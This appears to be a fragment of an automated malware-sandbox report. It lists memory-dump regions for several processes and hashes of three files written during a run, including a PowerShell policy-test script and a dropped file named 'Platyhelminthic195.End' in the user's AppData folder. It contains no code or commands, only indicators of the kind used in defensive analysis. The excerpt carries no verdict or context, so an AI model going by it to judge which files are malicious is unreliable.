memory/2516-0-0x00007FFEEAAA3000-0x00007FFEEAAA5000-memory.dmp
memory/2516-1-0x000001F898C90000-0x000001F898CB2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cbancuv1.ibb.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2516-11-0x00007FFEEAAA0000-0x00007FFEEB561000-memory.dmp
memory/2516-12-0x00007FFEEAAA0000-0x00007FFEEB561000-memory.dmp
memory/2516-15-0x00007FFEEAAA3000-0x00007FFEEAAA5000-memory.dmp
memory/2516-16-0x00007FFEEAAA0000-0x00007FFEEB561000-memory.dmp
memory/2516-17-0x00007FFEEAAA0000-0x00007FFEEB561000-memory.dmp
memory/2516-20-0x00007FFEEAAA0000-0x00007FFEEB561000-memory.dmp
memory/4948-21-0x00000000022B0000-0x00000000022E6000-memory.dmp
memory/4948-22-0x0000000004EC0000-0x00000000054E8000-memory.dmp
memory/4948-23-0x0000000004D10000-0x0000000004D32000-memory.dmp
memory/4948-25-0x00000000054F0000-0x0000000005556000-memory.dmp
memory/4948-24-0x0000000004DB0000-0x0000000004E16000-memory.dmp
memory/4948-35-0x00000000055A0000-0x00000000058F4000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 806286a9ea8981d782ba5872780e6a4c |
| SHA1 | 99fe6f0c1098145a7b60fda68af7e10880f145da |
| SHA256 | cd2c977928e78b2d39bba8a726308f17b2946ea3f1a432de209720f691450713 |
| SHA512 | 362df97f9fc9c2f546538814cd0402a364a286326219f03325f8cbd59d33f9d850c26daf42230f0bb4feb7e5134868a51e7a3d2f5bc136fe3de69d5d82c5ae2e |
memory/4948-37-0x0000000005BE0000-0x0000000005BFE000-memory.dmp
memory/4948-38-0x0000000005C30000-0x0000000005C7C000-memory.dmp
memory/4948-40-0x0000000006D40000-0x0000000006D5A000-memory.dmp
memory/4948-39-0x0000000007380000-0x00000000079FA000-memory.dmp
memory/4948-42-0x0000000006DF0000-0x0000000006E12000-memory.dmp
memory/4948-41-0x0000000006E50000-0x0000000006EE6000-memory.dmp
C:\Users\Admin\AppData\Roaming\Platyhelminthic195.End
| MD5 | 6771cd798c1df9b5eddc60071dfc6e15 |
| SHA1 | 65e923600e1c2604d90a481d257dc99c23fbf1dd |
| SHA256 | 0849655061e0ce5f5f2633e43ef08a62a3482cf9f15baf24fbd6b25f8abad95f |
| SHA512 | cf0013a56ef6ab5fb48ddd80d3e94b879b6890586a5e11313c66b35c352111d3fff2d21a9f9e42a4163cf4e05419610a696e5d428a32eacb45d6f4103b9085ee |
memory/4948-43-0x0000000007FB0000-0x0000000008554000-memory.dmp
memory/4948-45-0x0000000008560000-0x000000000D4E8000-memory.dmp
memory/4364-58-0x0000000001000000-0x0000000002254000-memory.dmp
memory/4364-59-0x0000000001000000-0x0000000002254000-memory.dmp